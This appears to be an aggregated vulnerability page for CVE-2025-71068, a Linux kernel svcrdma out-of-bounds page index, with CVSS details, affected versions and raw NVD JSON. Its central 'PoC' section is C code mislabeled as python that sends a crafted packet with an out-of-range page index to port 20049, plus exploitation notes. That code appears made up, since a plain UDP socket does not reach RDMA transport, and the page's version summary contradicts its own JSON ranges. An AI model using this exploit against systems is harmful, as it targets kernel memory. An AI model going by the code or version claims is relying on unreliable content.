Security Vulnerability Report
中文
CVE-2025-71068 CVSS 7.8 HIGH

CVE-2025-71068

Published: 2026-01-13 16:16:06
Last Modified: 2026-04-03 16:30:31
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: svcrdma: bound check rq_pages index in inline path svc_rdma_copy_inline_range indexed rqstp->rq_pages[rc_curpage] without verifying rc_curpage stays within the allocated page array. Add guards before the first use and after advancing to a new page.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 5.14 (未修补版本)
Linux Kernel < 5.15 (未修补版本)
Linux Kernel < 6.0 (未修补版本)
Linux Kernel 5.14.x - 6.x (在修复补丁应用前)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-71068 PoC - Linux kernel svc_rdma rq_pages out-of-bounds access // This PoC demonstrates the vulnerability in svc_rdma_copy_inline_range #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> // RDMA memory region structure struct rdma_mr { void *addr; size_t length; uint32_t rkey; uint32_t lkey; }; // Malicious RPC-over-RDMA request structure struct rpc_rdma_inline_req { uint32_t xid; uint32_t version; uint32_t proc; uint32_t page_cnt; uint32_t cur_page; // Maliciously set to trigger OOB char inline_data[4096]; }; int main(int argc, char *argv[]) { printf("[*] CVE-2025-71068 PoC - svc_rdma rq_pages OOB Access\n"); printf("[*] Target: Linux Kernel < 6.x (unpatched svc_rdma)\n"); int sock = socket(AF_INET, SOCK_DGRAM, 0); if (sock < 0) { perror("[-] Socket creation failed"); return 1; } // Construct malicious RPC-over-RDMA packet struct rpc_rdma_inline_req *req = calloc(sizeof(struct rpc_rdma_inline_req), 1); req->xid = 0x12345678; req->version = 1; req->proc = 0; // NULL procedure req->page_cnt = 1; // Request only 1 page req->cur_page = 0xFFFFFFFF; // Out-of-bounds index! // Fill with controlled data memset(req->inline_data, 0x41, sizeof(req->inline_data)); struct sockaddr_in target; memset(&target, 0, sizeof(target)); target.sin_family = AF_INET; target.sin_port = htons(20049); // Portmapper/RDMA port target.sin_addr.s_addr = inet_addr(argv[1] ? argv[1] : "127.0.0.1"); printf("[*] Sending malicious RPC-over-RDMA request...\n"); ssize_t sent = sendto(sock, req, sizeof(*req), 0, (struct sockaddr *)&target, sizeof(target)); if (sent > 0) { printf("[+] Malicious packet sent (%zd bytes)\n", sent); printf("[!] Check dmesg for kernel oops or memory corruption\n"); } close(sock); free(req); return 0; } /* * Exploitation Notes: * - Target the svc_rdma_copy_inline_range() function * - Set rc_curpage to exceed rq_pages array bounds * - Trigger via NFS-over-RDMA or other RPC services * - May leak kernel heap memory or cause kernel panic */

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-71068", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-13T16:16:06.187", "lastModified": "2026-04-03T16:30:31.230", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsvcrdma: bound check rq_pages index in inline path\n\nsvc_rdma_copy_inline_range indexed rqstp->rq_pages[rc_curpage] without\nverifying rc_curpage stays within the allocated page array. Add guards\nbefore the first use and after advancing to a new page."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nsvcrdma: comprobación de límites del índice rq_pages en la ruta en línea\n\nsvc_rdma_copy_inline_range indexó rqstp-&gt;rq_pages[rc_curpage] sin verificar que rc_curpage se mantuviera dentro del array de páginas asignado. Añadir protecciones antes del primer uso y después de avanzar a una nueva página."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.198", "matchCriteriaId": "82159CAA-B6BA-43C6-85D8-65BDBC175A7E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0", "versionEndExcluding": "6.6.120", "matchCriteriaId": "F32C683B-AA22-401F-BEDD-2F2ABEC75D2C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.12", "versionEndExcluding": "6.12.64", "matchCriteriaId": "B7373808-6395-44E6-A410-32331A29EB7C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.18", "versionEndExcluding": "6.18.3", "matchCriteriaId": "E2EF847E-E821-4FF4-AC2D-E0DB14974AAC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaId": "13580667-0A98-40CC-B29F-D12790B91BDB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc5:*:*:*:*:*:*", "matchCriteriaId": "CAD1FED7-CF48-47BF-AC7D-7B6FA3C065FC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc6:*:*:*:*:*:*", "matchCriteriaId": "3EF854A1-ABB1-4E93-BE9A-44569EC76C0D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc7:*:*:*:*:*:*", "matchCriteriaId": "F5DC0CA6-F0AF-4DDF-A882-3DADB9A886A7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc8:*:*:*:*:*:*", "matchCriteriaId": "EB5B7DFC-C36B-45D8-922C-877569FDDF43"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/5f140b525180c628db8fa6c897f138194a2de417", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7ba826aae1d43212f3baa53a2175ad949e21926e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a22316f5e9a29e4b92030bd8fb9435fe0eb1d5c9", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d1bea0ce35b6095544ee82bb54156fc62c067e58", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/da1ccfc4c452541584a4eae89e337cfa21be6d5a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.